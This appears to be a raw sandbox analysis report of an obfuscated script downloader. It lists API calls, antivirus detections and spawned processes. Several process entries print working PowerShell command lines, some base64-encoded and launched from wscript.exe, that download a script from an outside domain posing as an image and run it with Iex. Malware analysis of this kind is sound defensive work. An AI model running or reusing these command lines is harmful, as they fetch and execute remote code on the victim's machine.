process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
parameters: $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent tpdÔ5™†[6´Q˛ÁyU\[ÊBøùP"#®“»//5 ÀÀÀ À 28/ÿtranscendgroup.co  
Data sent tpdÔ5cZ‘ËN%' Æî÷IéS¼uƒgL<é¹5‘Ì/5 ÀÀÀ À 28/ÿtranscendgroup.co  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
MicroWorld-eScan GT:VB.ObfDldr.30.C108691B
FireEye GT:VB.ObfDldr.30.C108691B
Arcabit GT:VB.ObfDldr.30.C108691B
Avast Script:SNH-gen [Drp]
BitDefender GT:VB.ObfDldr.30.C108691B
NANO-Antivirus Trojan.Script.Downloader.hrqanu
VIPRE GT:VB.ObfDldr.30.C108691B
Emsisoft GT:VB.ObfDldr.30.C108691B (B)
MAX malware (ai score=83)
GData GT:VB.ObfDldr.30.C108691B
ALYac GT:VB.ObfDldr.30.C108691B
AVG Script:SNH-gen [Drp]
Time & API Arguments Status Return Repeated

send

buffer: tpdÔ5™†[6´Q˛ÁyU\[ÊBøùP"#®“»//5 ÀÀÀ À 28/ÿtranscendgroup.co  
socket: 1488
sent: 121
1 121 0

send

buffer: tpdÔ5cZ‘ËN%' Æî÷IéS¼uƒgL<é¹5‘Ì/5 ÀÀÀ À 28/ÿtranscendgroup.co  
socket: 1488
sent: 121
1 121 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"
parent_process wscript.exe martian_process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe